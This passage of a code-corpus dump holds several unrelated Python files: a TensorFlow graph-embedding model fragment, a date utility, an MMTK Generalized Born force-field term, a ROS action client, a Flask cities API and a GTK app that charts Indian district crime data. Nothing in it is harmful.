num_samples, support_sizes2)\r\n\r\n\r\n outputs1 = tf.nn.l2_normalize(outputs1, 1)\r\n outputs2 = tf.nn.l2_normalize(outputs2, 1)\r\n return outputs1, outputs2\r\n\r\n\"\"\"\r\n def build(self):\r\n self._build()\r\n\r\n # TF graph management\r\n self._loss()\r\n self._accuracy()\r\n self.loss = self.loss / tf.cast(self.batch_size, tf.float32)\r\n grads_and_vars = self.optimizer.compute_gradients(self.loss)\r\n clipped_grads_and_vars = [(tf.clip_by_value(grad, -5.0, 5.0) if grad is not None else None, var) \r\n for grad, var in grads_and_vars]\r\n self.grad, _ = clipped_grads_and_vars[0]\r\n self.opt_op = self.optimizer.apply_gradients(clipped_grads_and_vars)\r\n\r\n def _loss(self):\r\n for aggregator in self.aggregators:\r\n for var in aggregator.vars.values():\r\n self.loss += FLAGS.weight_decay * tf.nn.l2_loss(var)\r\n\r\n self.loss += self.link_pred_layer.loss(self.outputs1, self.outputs2, self.neg_outputs) \r\n tf.summary.scalar('loss', self.loss)\r\n\r\n def _accuracy(self):\r\n # shape: [batch_size]\r\n aff = self.link_pred_layer.affinity(self.outputs1, self.outputs2)\r\n # shape : [batch_size x num_neg_samples]\r\n\r\n _aff = tf.expand_dims(aff, axis=1)\r\n self.aff_all = tf.concat(axis=1, values=[self.neg_aff, _aff])\r\n size = tf.shape(self.aff_all)[1]\r\n _, indices_of_ranks = tf.nn.top_k(self.aff_all, k=size)\r\n _, self.ranks = tf.nn.top_k(-indices_of_ranks, k=size)\r\n self.mrr = tf.reduce_mean(tf.div(1.0, tf.cast(self.ranks[:, -1] + 1, tf.float32)))\r\n tf.summary.scalar('mrr', self.mrr)\r\n\r\n\"\"\"\r\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"298848082","text":"import datetime\n\ndef dayAdd(s,d):\n\tdate = datetime.datetime.strptime(s, \"%Y-%m-%d %H:%M:%S\")\n\tdate += datetime.timedelta(days=d)\n\treturn (date.strftime('%Y-%m-%d %H:%M:%S'))\n\ndef main():\n\ts = \"2017-10-06 13:19:37\"\n\tprint(s)\n\tprint(dayAdd(s,3))\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"scripts/dateadd.py","file_name":"dateadd.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"449173969","text":"# Onufriev-Bashford-Case Generalized Born term\n# can be added to any other force field\n\nfrom MMTK import ParticleScalar\nfrom MMTK.ForceFields.ForceField import ForceField\nfrom MMTK_OBC import OBCTerm\n\nclass OBCForceField(ForceField):\n\n \"\"\"\n Onufriev-Bashford-Case Generalized Born\n \"\"\"\n\n def __init__(self, prmtopFN,\n prmtop_atom_order, inv_prmtop_atom_order):\n \"\"\"\n @param prmtopFN: an AMBER parameter and topology file\n @type strength: C{str}\n \"\"\"\n # Initialize the ForceField class, giving a name to this one.\n ForceField.__init__(self, 'OBC')\n\n # Store arguments that recreate the force field from a pickled\n # universe or from a trajectory.\n self.arguments = (prmtopFN, prmtop_atom_order, inv_prmtop_atom_order)\n \n self.prmtopFN = prmtopFN\n self.prmtop_atom_order = prmtop_atom_order\n self.inv_prmtop_atom_order = inv_prmtop_atom_order\n\n # The following method is called by the energy evaluation engine\n # to inquire if this force field term has all the parameters it\n # requires. This is necessary for interdependent force field\n # terms. In our case, we just say \"yes\" immediately.\n def ready(self, global_data):\n return True\n\n # The following method is called by the energy evaluation engine\n # to obtain a list of the low-level evaluator objects (the C routines)\n # that handle the calculations.\n def evaluatorTerms(self, universe, subset1, subset2, global_data):\n # The energy for subsets is defined as consisting only\n # of interactions within that subset, so the contribution\n # of an external field is zero. Therefore we just return\n # an empty list of energy terms.\n if subset1 is not None or subset2 is not None:\n return []\n\n # Get charges, radii, and scale factors from OpenMM\n import simtk.openmm\n import simtk.openmm.app as OpenMM_app\n \n prmtop = OpenMM_app.AmberPrmtopFile(self.prmtopFN)\n OMM_system = prmtop.createSystem(\\\n \tnonbondedMethod=OpenMM_app.CutoffNonPeriodic, \\\n nonbondedCutoff=1.5, \\\n constraints=None, \\\n implicitSolvent=OpenMM_app.OBC2)\n f = OMM_system.getForces()[-2]\n\n import numpy as np\n numParticles = f.getNumParticles()\n charges = np.zeros(numParticles)\n atomicRadii = np.zeros(numParticles)\n scaleFactors = np.zeros(numParticles)\n for n in range(numParticles):\n (charge, radius, scaleFactor) = f.getParticleParameters(n)\n charges[n] = charge/simtk.unit.elementary_charge\n atomicRadii[n] = radius/simtk.unit.nanometer\n scaleFactors[n] = scaleFactor\n\n charges = charges[self.inv_prmtop_atom_order]\n atomicRadii = atomicRadii[self.inv_prmtop_atom_order]\n scaleFactors = scaleFactors[self.inv_prmtop_atom_order]\n\n# import time\n# import os.path\n# import MMTK_OBC\n# OBCpath = MMTK_OBC.__file__\n# print \"\"\"\n# in {0}\n# last modified {1}\n# \"\"\".format(OBCpath, time.ctime(os.path.getmtime(OBCpath)))\n\n # Here we pass all the parameters as \"simple\" data types to\n # the C code that handles energy calculations.\n return [OBCTerm(universe._spec, charges, atomicRadii, scaleFactors, 'OBC')]\n","sub_path":"AlGDock/ForceFields/OBC/OBC.py","file_name":"OBC.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"268910388","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport sys\n\nfrom time import sleep\nimport random\nimport rospy\nimport actionlib\n\nfrom actionlib_msgs.msg import GoalStatus\nfrom geometry_msgs.msg import Vector3\nfrom bitbots_msgs.msg import DynUpGoal, DynUpAction, DynUpFeedback\nfrom visualization_msgs.msg import Marker\n\nshowing_feedback = False\n\nif __name__ == \"__main__\":\n print(\"[..] Initializing node\", end='')\n rospy.init_node('dynup_dummy_client', anonymous=True)\n print(\"\\r[OK] Initializing node\")\n\n\n def done_cb(state, result):\n print('Action completed: ', end='')\n if state == GoalStatus.PENDING:\n print('Pending')\n elif state == GoalStatus.ACTIVE:\n print('Active')\n elif state == GoalStatus.PREEMPTED:\n print('Preempted')\n elif state == GoalStatus.SUCCEEDED:\n print('Succeeded')\n elif state == GoalStatus.ABORTED:\n print('Aborted')\n elif state == GoalStatus.REJECTED:\n print('Rejected')\n elif state == GoalStatus.PREEMPTING:\n print('Preempting')\n elif state == GoalStatus.RECALLING:\n print('Recalling')\n elif state == GoalStatus.RECALLED:\n print('Recalled')\n elif state == GoalStatus.LOST:\n print('Lost')\n else:\n print('Unknown state', state)\n print(str(result))\n\n\n def active_cb():\n print(\"Server accepted action\")\n\n\n def feedback_cb(feedback):\n if len(sys.argv) > 1 and sys.argv[1] == '--feedback':\n print('Feedback')\n print(feedback)\n print()\n\n\n print('[..] Connecting to action server \\'dynup\\'', end='')\n sys.stdout.flush()\n client = actionlib.SimpleActionClient('dynup', DynUpAction)\n if not client.wait_for_server():\n exit(1)\n print('\\r[OK] Connecting to action server \\'dynup\\'')\n print()\n\n goal = DynUpGoal()\n goal.front = True\n\n client.send_goal(goal)\n client.done_cb = done_cb\n client.feedback_cb = feedback_cb\n client.active_cb = active_cb\n print(\"Sent new goal. Waiting for result\")\n client.wait_for_result()\n","sub_path":"bitbots_dynup/scripts/dummy_client.py","file_name":"dummy_client.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"412176232","text":"#!/usr/bin/python3\n\"\"\"\n View Cities\n\"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import Flask, jsonify, abort, make_response, request\nfrom models.city import City\nfrom models import storage\nimport json\n\n\n@app_views.route('/states//cities', strict_slashes=False)\ndef cities(state_id):\n \"\"\"\n Return all cities of a state\n \"\"\"\n state = storage.get('State', state_id)\n if state is None:\n abort(404)\n cities = [city.to_dict() for city in state.cities]\n\n return jsonify(cities)\n\n\n@app_views.route('/cities/', strict_slashes=False)\ndef list_cities(city_id):\n \"\"\"\n Retrieves a city object\n \"\"\"\n city = storage.get('City', city_id)\n if city is None:\n abort(404)\n city = city.to_dict()\n\n return jsonify(city)\n\n\n@app_views.route('/cities/', methods=['DELETE'],\n strict_slashes=False)\ndef delete_city(city_id):\n \"\"\"\n deletes a city object\n \"\"\"\n city = storage.get('City', city_id)\n if city is None:\n abort(404)\n\n storage.delete(city)\n storage.save()\n\n return make_response(jsonify({}), 200)\n\n\n@app_views.route('/states//cities', methods=['POST'],\n strict_slashes=False)\ndef post_city(state_id):\n \"\"\"\n post a city object\n \"\"\"\n if not request.json:\n abort(400, \"Not a JSON\")\n data = request.json\n if 'name' not in data.keys():\n abort(400, \"Missing name\")\n\n state = storage.get(\"State\", state_id)\n if state is None:\n abort(404)\n data['state_id'] = state_id\n instance = City(**data)\n storage.new(instance)\n storage.save()\n\n return make_response(jsonify(instance.to_dict()), 201)\n\n\n@app_views.route('/cities/', methods=['PUT'], strict_slashes=False)\ndef update_city(city_id):\n \"\"\"\n update a city object\n \"\"\"\n city = storage.get('City', city_id)\n if city is None:\n abort(404)\n\n if not request.json:\n abort(400, \"Not a JSON\")\n\n data = request.json\n for key, value in data.items():\n setattr(city, key, value)\n\n storage.save()\n\n return make_response(jsonify(city.to_dict()), 200)\n","sub_path":"api/v1/views/cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"427971696","text":"import gtk\nimport pandas as pd\nfrom pandas import Series as s\nfrom pandas import DataFrame as df\nimport numpy as np\nfrom matplotlib.backends.backend_gtkagg import FigureCanvasGTKAgg as FigureCanvas\nfrom matplotlib.backends.backend_gtkagg import NavigationToolbar2GTKAgg as NavigationToolbar\nfrom matplotlib.backend_bases import key_press_handler\nfrom matplotlib.figure import Figure\n\nclass PyApp(gtk.Window):\n\n\tdata = pd.read_csv(\"Crimes_commited_ipc2.csv\")\n\tcombobox_district = gtk.ComboBox()\t\n\tcombobox_year = gtk.ComboBox()\n\tcombobox_state = gtk.ComboBox()\n\tcombobox_crime = gtk.ComboBox()\n\tcombobox_state1 = gtk.ComboBox()\n\tcombobox_state2 = gtk.ComboBox()\n\tcombobox_yearc = gtk.ComboBox()\n\tbutton_show_graph = gtk.Button(\"Show Graph\")\n\tcompare_button = gtk.Button(\"Compare\")\n\tfiltered_data = df()\n\n\tstore_dist = gtk.ListStore(str)\n\n\tdef __init__(self):\n\t\tsuper(PyApp, self).__init__()\n\n\t\tself.set_title(\"Crimes in India\")\n\t\tself.set_size_request(700, 500)\n\t\t#self.set_icon_from_file(\"/home/safwan/Downloads/icon.png\")\n\n\t\t# Set window background image\n\t\tpixbuf = gtk.gdk.pixbuf_new_from_file(\"vector-grunge-texture-background.jpg\")\n\t\tpixmap, mask = pixbuf.render_pixmap_and_mask()\n\t\twidth, height = pixmap.get_size()\n\t\t#del pixbuf\n\t\tself.set_app_paintable(gtk.TRUE)\n\t\tself.resize(width, height)\n\t\tself.realize()\n\t\tself.window.set_back_pixmap(pixmap, gtk.FALSE)\n\t\t#del pixmap\n\n\t\tnb = gtk.Notebook()\n\t\tnb.set_tab_pos(gtk.POS_TOP)\n\t\tvbox = gtk.VBox(False, 5)\n\n\t\tvb = gtk.VBox()\n\t\thbox = gtk.HBox(True, 3)\n\t\thlabelsbox = gtk.HBox(True, 120)\n\t\thbuttonbox = gtk.HBox(True, 10)\n\n\t\t# Horizontal box for labels\n\t\tlabel_state = gtk.Label(\"State\")\n\t\tlabel_district = gtk.Label(\"District\")\n\t\tlabel_year = gtk.Label(\"Year\")\n\t\tlabel_crime = gtk.Label(\"Crime\")\n\n\t\thlabelsbox.pack_start(label_state, True, True, 10)\n\t\thlabelsbox.pack_start(label_district, True, True, 10)\n\t\thlabelsbox.pack_start(label_year, True, True, 10)\n\t\thlabelsbox.pack_start(label_crime, True, True, 10)\n\n\t\tvalign = gtk.Alignment(0.25, 0.10, 0, 0)\n\t\tvalign1 = gtk.Alignment(0, 1, 0, 0)\n\t\tvalign2 = gtk.Alignment(0, 0, 1, 0)\n\t\t\n\t\tstore = gtk.ListStore(str)\n\t\tcell = gtk.CellRendererText()\n\t\tself.combobox_state.pack_start(cell)\n\t\tself.combobox_state.set_title(\"States\")\n\t\tself.combobox_state.add_attribute(cell, 'text', 0)\n\n\t\thbox.pack_start(self.combobox_state, True, True, 10)\n\n\t\tstore.append ([\"ANDHRA PRADESH\"])\n\t\tstore.append ([\"ARUNACHAL PRADESH\"])\n\t\tstore.append ([\"ASSAM\"])\n\t\tstore.append ([\"BIHAR\"])\n\t\tstore.append ([\"GOA\"])\n\t\tstore.append ([\"GUJARAT\"])\n\t\tstore.append ([\"HARYANA\"])\n\t\tstore.append ([\"HIMACHAL PRADESH\"])\n\t\tstore.append ([\"JAMMU & KASHMIR\"])\n\t\tstore.append ([\"JHARKHAND\"])\n\t\tstore.append ([\"KARNATAKA\"])\n\t\tstore.append ([\"KERALA\"])\n\t\tstore.append ([\"MADHYA PRADESH\"])\n\t\tstore.append ([\"MAHARASHTRA\"])\n\t\tstore.append ([\"MANIPUR\"])\n\t\tstore.append ([\"MEGHALAYA\"])\n\t\tstore.append ([\"MIZORAM\"])\n\t\tstore.append ([\"NAGALAND\"])\n\t\tstore.append ([\"ODISHA\"])\n\t\tstore.append ([\"MIZORAM\"])\n\t\tstore.append ([\"PUNJAB\"])\n\t\tstore.append ([\"RAJASTHAN\"])\n\t\tstore.append ([\"TAMIL NADU\"])\n\t\tstore.append ([\"TRIPURA\"])\n\t\tstore.append ([\"UTTAR PRADESH\"])\n\t\tstore.append ([\"UTTARAKHAND\"])\n\t\tstore.append ([\"WEST BENGAL\"])\n\t\tstore.append ([\"A & N ISLANDS\"])\n\t\tstore.append ([\"CHANDIGARH\"])\n\t\tstore.append ([\"D & N HAVELI\"])\n\t\tstore.append ([\"DAMAN & DIU\"])\n\t\tstore.append ([\"DELHI UT\"])\n\t\tstore.append ([\"LAKSHADWEEP\"])\n\t\tstore.append ([\"PUDUCHERRY\"])\n\t\t\n\t\tself.combobox_state.set_model(store)\n\t\tself.combobox_state.connect('changed', self.on_changed)\n\t\tself.combobox_state.set_active(0)\n\n\t\tself.store_dist = gtk.ListStore(str)\n\t\tcell_dist = gtk.CellRendererText()\n\t\tself.combobox_district.pack_start(cell_dist)\n\t\tself.combobox_district.add_attribute(cell_dist, 'text', 0)\n\t\tself.combobox_district.connect('changed', self.on_changed_district)\n\t\thbox.pack_start(self.combobox_district, True, True, 10)\n\n\t\t\n\t\t#Year dropbox\n\t\t\n\t\tstore_year = gtk.ListStore(str)\n\t\tcell_year = gtk.CellRendererText()\n\t\tself.combobox_year.pack_start(cell_year)\n\t\tself.combobox_year.add_attribute(cell_year, 'text', 0)\n\n\t\thbox.pack_start(self.combobox_year, True, True, 10)\n\n\t\tdistrict = self.data[(self.data['STATEorUT']=='ANDHRA PRADESH') | (self.data['STATEorUT']=='Andhra Pradesh')].filter(items=['STATE/UT','DISTRICT','YEAR'])\n\t\tyear=s(district['YEAR']).unique().tolist()\n\t\tstore_year.append([\"All\"])\n\t\tfor i in year:\n\t\t\tstore_year.append([i])\n\t\t\n\t\tself.combobox_year.set_model(store_year)\n\t\t#combobox.connect('changed', self.on_changed)\n\t\tself.combobox_year.set_active(0)\n\t\tself.combobox_year.connect('changed', self.on_changed_year)\n\n\t\t# Crime dropbox\n\t\t\n\t\tstore_crime = gtk.ListStore(str)\n\t\tcell_crime = gtk.CellRendererText()\n\t\tself.combobox_crime.pack_start(cell_crime)\n\t\tself.combobox_crime.add_attribute(cell_crime, 'text', 0)\n\t\tself.combobox_crime.connect('changed', self.on_changed_crime)\n\n\t\thbox.pack_start(self.combobox_crime, True, True, 10)\n\n\t\tstore_crime.append ([\"MURDER\"])\n\t\tstore_crime.append ([\"RAPE\"])\n\t\tstore_crime.append ([\"KIDNAPPING\"])\n\t\tstore_crime.append ([\"RIOTS\"])\n\t\tstore_crime.append ([\"ROBBERY\"])\n\t\tstore_crime.append ([\"BURGLARY\"])\n\t\tstore_crime.append ([\"DOWRY DEATHS\"])\n\t\tstore_crime.append ([\"TOTAL IPC CRIMES\"])\n\t\tself.combobox_crime.set_model(store_crime)\n\t\t#combobox.connect('changed', self.on_changed)\n\t\tself.combobox_crime.set_active(0)\t\t\n\n\t\tvalign.add(hbox)\n\t\tvalign1.add(hlabelsbox)\n\t\t\n\t\tbutton_disp_data = gtk.Button(\"Display Data\")\n\n\t\tbutton_disp_data.connect(\"clicked\", self.display_data)\n\t\tself.button_show_graph.connect(\"clicked\", self.display_graph)\n\n\t\tself.button_show_graph.set_sensitive(False)\n\n\t\thbuttonbox.pack_start(button_disp_data, True, True, 10)\n\t\thbuttonbox.pack_start(self.button_show_graph, True, True, 10)\n\t\tvalign2.add(hbuttonbox)\n\t\tvbox.pack_start(valign1)\n\t\tvbox.pack_start(valign)\n\t\tvbox.pack_start(valign2)\n\t\t\n\t\tnb.append_page(vbox)\n\t\tnb.set_tab_label_text(vbox, \"District wise crimes\")\n\n\t\t# Code for 2nd TAB\n\n\t\tstate1lbl = gtk.Label(\"State 1\")\n\t\tstate2lbl = gtk.Label(\"State 2\")\n\t\t\n\t\t\n\t\t\n\t\tself.compare_button.connect(\"clicked\", self.compare_states)\n\t\tself.compare_button.set_sensitive(False)\n\n\t\ttable = gtk.Table(8,4,True)\n\t\ttable.set_col_spacings(7)\n\n\t\tstates = [\"ANDHRA PRADESH\", \"ARUNACHAL PRADESH\", \"ASSAM\", \"BIHAR\",\"CHHATTISGARH\", \"GOA\",\"GUJARAT\",\"HARYANA\",\"HIMACHAL PRADESH\", \"JAMMU & KASHMIR\", \"JHARKHAND\", \"KARNATAKA\", \"KERALA\", \"MADHYA PRADESH\", \"MAHARASHTRA\", \"MANIPUR\", \"MEGHALAYA\", \"MIZORAM\", \"NAGALAND\", \"ODISHA\", \"PUNJAB\", \"RAJASTHAN\", \"SIKKIM\", \"TAMIL NADU\", \"TRIPURA\", \"UTTAR PRADESH\", \"UTTARAKHAND\", \"WEST BENGAL\",\"A & N ISLANDS\", \"CHANDIGARH\", \"D & N HAVELI\", \"DAMAN & DIU\", \"DELHI UT\", \"LAKSHADWEEP\", \"PUDUCHERRY\"]\n\t\tstorestate1 = gtk.ListStore(str)\n\t\tcellstate1 = gtk.CellRendererText()\n\t\tself.combobox_state1.pack_start(cellstate1)\n\t\tself.combobox_state1.add_attribute(cellstate1, 'text', 0)\n\t\tself.combobox_state1.set_active(0)\n\t\tfor i in states:\n\t\t\tstorestate1.append([i])\n\t\tself.combobox_state1.set_model(storestate1)\n\t\t\n\n\t\tstorestate2 = gtk.ListStore(str)\n\t\tcellstate2 = gtk.CellRendererText()\n\t\tself.combobox_state2.pack_start(cellstate2)\n\t\tself.combobox_state2.add_attribute(cellstate2, 'text', 0)\n\t\tself.combobox_state2.set_active(0)\n\t\tfor i in states:\n\t\t\tstorestate2.append([i])\n\t\tself.combobox_state2.set_model(storestate2)\n\n\t\tstore_yearc = gtk.ListStore(str)\n\t\tcell_yearc = gtk.CellRendererText()\t\t\n\t\tself.combobox_yearc.pack_start(cell_yearc)\n\t\tself.combobox_yearc.add_attribute(cell_yearc, 'text', 0)\n\t\tself.combobox_yearc.set_active(0)\n\n\t\tfor i in year:\n\t\t\tstore_yearc.append([i])\n\t\tself.combobox_yearc.set_model(store_yearc)\n\n\t\tself.combobox_state1.connect('changed', self.on_changed_state1)\n\t\tself.combobox_state2.connect('changed', self.on_changed_state2)\n\t\tself.combobox_yearc.connect('changed', self.on_changed_yearc)\n\n\n\t\ttable.attach(state1lbl, 0, 1, 3, 4)\n\t\ttable.attach(state2lbl, 2, 3, 3, 4)\n\t\ttable.attach(self.combobox_state1, 0, 1, 4, 5,xpadding = 8, ypadding=9)\n\t\ttable.attach(self.combobox_state2, 2, 3, 4, 5,xpadding = 8, ypadding=9)\n\t\ttable.attach(self.combobox_yearc, 1, 2, 4, 5,xpadding = 8, ypadding=9)\n\t\ttable.attach(self.compare_button, 1, 2, 6, 7, xpadding = 8, ypadding=9)\n\t\t\n\t\tnb.append_page(table)\n\t\tnb.set_tab_label_text(table, \"Comparison of states\")\n\n\t\ttv = gtk.TextView()\n\t\tnb.append_page(tv)\n\t\tnb.set_tab_label_text(tv, \"About\")\n\t\t\n\t\tself.add(nb)\n\t\t\n\t\tself.connect(\"destroy\", gtk.main_quit)\t\t\n\t\tself.show_all()\n\n\tdef on_changed_state1(self, widget):\n\t\tif(widget.get_active_text() == self.combobox_state2.get_active_text()):\n\t\t\tself.compare_button.set_sensitive(False)\n\t\telse:\n\t\t\tself.compare_button.set_sensitive(True)\n\t\treturn\n\n\tdef on_changed_state2(self, widget):\n\t\tif(widget.get_active_text() == self.combobox_state1.get_active_text()):\n\t\t\tself.compare_button.set_sensitive(False)\n\t\telse:\n\t\t\tself.compare_button.set_sensitive(True)\n\t\treturn\n\n\tdef on_changed_yearc(self, widget):\n\t\treturn\n\n\tdef on_changed(self, widget):\n\t\t#data = pd.read_csv(\"/home/safwan/crime-in-india/crime/01_District_wise_crimes_committed_IPC_2013.csv\"\t\n\t\tdistrict = s(self.data[self.data['STATEorUT']==widget.get_active_text()].filter(items=['DISTRICT'])['DISTRICT']).unique().tolist()\n\t\tself.store_dist.clear()\n\t\tself.store_dist.append([\"All\"])\n\t\tfor i in district:\n\t\t\tself.store_dist.append([i])\n\n\t\tself.combobox_district.set_model(self.store_dist)\n\t\t#combobox.connect('changed', self.on_changed)\n\t\tself.combobox_district.set_active(0)\n\n\n\tdef display_data(self, widget):\n\t\t#print self.combobox_state.get_active_text(), self.combobox_year.get_active_text(), self.combobox_district.get_active_text(), self.combobox_crime.get_active_text()\n\t\t#filtered_data = self.data[((self.data['STATE.UT']==self.combobox_state.get_active_text()) & (self.data['DISTRICT']==self.combobox_district.get_active_text()) & (self.data['YEAR']==self.combobox_year.get_active_text()))].filter(items=['STATE/UT','DISTRICT','YEAR', self.combobox_crime.get_active_text()])\n\n\t\tdialog = gtk.Dialog(\"My dialog\",\n\t\tself,\n\t\tgtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,\n\t\t(gtk.STOCK_OK, gtk.RESPONSE_ACCEPT))\n\t\tdialog.set_size_request(400,700)\n\t\t\n\t\tliststore = gtk.ListStore(str, str, str, str)\n\n\t\ttreeview = gtk.TreeView(liststore)\n\n\t\ttvcolumn = gtk.TreeViewColumn(\"STATE/UT\")\n\t\ttvcolumn1 = gtk.TreeViewColumn(\"DISTRICT\")\n\t\ttvcolumn2 = gtk.TreeViewColumn(\"YEAR\")\n\t\ttvcolumn3 = gtk.TreeViewColumn(self.combobox_crime.get_active_text())\n\t\t\n\t\tfor i in self.filtered_data.values.tolist():\n\t\t\tliststore.append(i)\t\n\t\t#liststore.append(['Open', gtk.STOCK_OPEN, 'Open a File', True])\n\t\n\t\ttreeview.append_column(tvcolumn)\n\t\ttreeview.append_column(tvcolumn1)\n\t\ttreeview.append_column(tvcolumn2)\n\t\ttreeview.append_column(tvcolumn3)\n\n\t\tcell = gtk.CellRendererText()\n\t\tcell1 = gtk.CellRendererText()\n\t\tcell2 = gtk.CellRendererText()\n\t\tcell3 = gtk.CellRendererText()\n\t\t\n\t\tcell.set_property('cell-background', 'yellow')\n\t\tcell1.set_property('cell-background', 'cyan')\n\t\tcell2.set_property('cell-background', 'pink')\n\t\tcell3.set_property('cell-background', 'red')\n\n\t\ttvcolumn.pack_start(cell, False)\n\t\ttvcolumn1.pack_start(cell1, True)\n\t\ttvcolumn2.pack_start(cell2, True)\n\t\ttvcolumn3.pack_start(cell3, True)\n\n\t\ttvcolumn.set_attributes(cell, text = 0)\n\t\ttvcolumn1.set_attributes(cell1, text = 1)\n\t\ttvcolumn2.set_attributes(cell2, text = 2)\n\t\ttvcolumn3.set_attributes(cell3, text = 3)\n\n\t\tscrolled_window = gtk.ScrolledWindow()\n\t\tscrolled_window.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC)\n\t\tscrolled_window.add(treeview)\n\t\tscrolled_window.set_border_width(10)\n\t\t#scrolled_window.set_min_content_height(200)\n\n\t\tscrolled_window.add(treeview)\n\n\t\t\n\t\ttreeview.set_search_column(0)\n\t\tdialog.vbox.add(scrolled_window)\n\t\ttreeview.show()\n\t\tscrolled_window.show()\n\t\tres = dialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\treturn\n\n\tdef display_graph(self, widget):\n\t\tdialog = gtk.Dialog(\"My dialog\",\n\t\tself,\n\t\tgtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,\n\t\t(gtk.STOCK_OK, gtk.RESPONSE_ACCEPT))\n\t\tdialog.set_size_request(1300,500)\n\n\t\t# Crime name filter\n\t\tif \" \" not in self.combobox_crime.get_active_text():\n\t\t\tcrime = self.combobox_crime.get_active_text()\n\t\telse:\n\t\t\tcrime = \".\".join(self.combobox_crime.get_active_text().split(\" \"))\n\n\t\t\n\n\t\tfig = Figure(figsize=(12, 10), dpi=100)\n\n\t\tsales = [{'Groups':'0-9', 'Counts':38},\n\t\t\t\t{'Groups':'10-19', 'Counts':41},\n\t\t\t\t{'Groups':'20-29', 'Counts':77},\n\t\t\t\t{'Groups':'30-39', 'Counts':73},\n\t\t\t\t{'Groups':'40-49', 'Counts':77}]\n\t\tdf = pd.DataFrame(sales)\n\n\t\tax = fig.add_subplot(111)\n\n\t\tif (self.combobox_year.get_active_text() == \"All\" and self.combobox_district.get_active_text() != \"All\"):\n\t\t\t\n\t\t\tself.filtered_data = self.filtered_data.reset_index(drop=True)\n\t\t\typos = np.arange(len(self.filtered_data['YEAR'].tolist()))\n\t\t\tp1 = ax.bar(ypos, self.filtered_data[crime], width=0.6, color='r')\n\n\t\t\tax.set_title(crime.lower() +'s in ' + self.combobox_district.get_active_text() +' - Yearwise')\n\t\t\tax.set_xticks(ypos+0.3)\n\t\t\tax.set_xticklabels(self.filtered_data.YEAR)\n\t\telif (self.combobox_district.get_active_text() == \"All\" and self.combobox_year.get_active_text() != \"All\"):\n\t\t\tfd_total_removed = self.filtered_data[self.filtered_data.DISTRICT != 'TOTAL']\n\t\t\typos = np.arange(len(fd_total_removed['DISTRICT'].tolist()))\n\t\t\t\n\t\t\tp1 = ax.bar(ypos, fd_total_removed[crime], width=0.3, color='r')\n\t\t\tfontx = {'fontsize': 7,\n \t\t\t\t\t'fontweight': 2,\n \t\t\t\t\t'verticalalignment': 'center',\n \t\t\t\t\t'horizontalalignment': 'center'}\n\n\t\t\tax.set_title(crime + 's in ' + self.combobox_state.get_active_text() + '(' +self.combobox_state.get_active_text()+' )' + ' - Districtwise')\n\t\t\tax.set_xticks(ypos+0.15)\n\t\t\tax.set_xticklabels(fd_total_removed.DISTRICT, fontdict=fontx)\n\t\telse:\n\t\t\tprint(df.index)\n\t\t\tp1 = ax.bar(df.index, df.Counts, width=0.8, color='r')\n\n\n\t\t\tax.set_title('Scores by group and gender')\n\t\t\tax.set_xticks(df.index+0.4)\n\t\t\tax.set_xticklabels(df.Groups)\n\n\t\tcanvas = FigureCanvas(fig) # a gtk.DrawingArea\n\t\tcanvas.set_size_request(800, 600)\n\t\tdialog.vbox.pack_start(canvas)\n\t\ttoolbar = NavigationToolbar(canvas, dialog)\n\t\tdialog.vbox.pack_start(toolbar, False, False)\n\t\tcanvas.show()\n\t\tdialog.run()\n\t\tdialog.destroy()\n\t\treturn\n\n\tdef on_changed_district(self, widget):\n\t\tif(self.combobox_year.get_active_text() != 'All'):\t\t\n\t\t\tintyear = int(self.combobox_year.get_active_text())\n\n\t\t# Check crime field\n\t\tif \" \" not in self.combobox_crime.get_active_text():\n\t\t\tcrime = self.combobox_crime.get_active_text()\n\t\telse:\n\t\t\tcrime = \".\".join(self.combobox_crime.get_active_text().split(\" \"))\n\n\t\tif(self.combobox_district.get_active_text() == 'All' and self.combobox_year.get_active_text() == 'All'):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text()').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\t\tself.button_show_graph.set_sensitive(False)\n\t\telif(self.combobox_district.get_active_text() == 'All'):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text() and YEAR == @intyear').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\t\tself.button_show_graph.set_sensitive(True)\n\t\telif (self.combobox_year.get_active_text() == \"All\"):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text() and DISTRICT == @self.combobox_district.get_active_text()').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\t\tself.button_show_graph.set_sensitive(True)\t\n\t\telse:\n\t\t\tself.button_show_graph.set_sensitive(False)\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text() and DISTRICT == @self.combobox_district.get_active_text() and YEAR == @intyear').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\t\t\t\n\t\treturn\n\n\tdef on_changed_year(self, widget):\n\t\tif(self.combobox_year.get_active_text() != 'All'):\t\t\n\t\t\tintyear = int(self.combobox_year.get_active_text())\n\n\t\t# Check crime field\n\t\tif \" \" not in self.combobox_crime.get_active_text():\n\t\t\tcrime = self.combobox_crime.get_active_text()\n\t\telse:\n\t\t\tcrime = \".\".join(self.combobox_crime.get_active_text().split(\" \"))\n\n\t\tif(self.combobox_district.get_active_text() == 'All' and self.combobox_year.get_active_text() == 'All'):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == 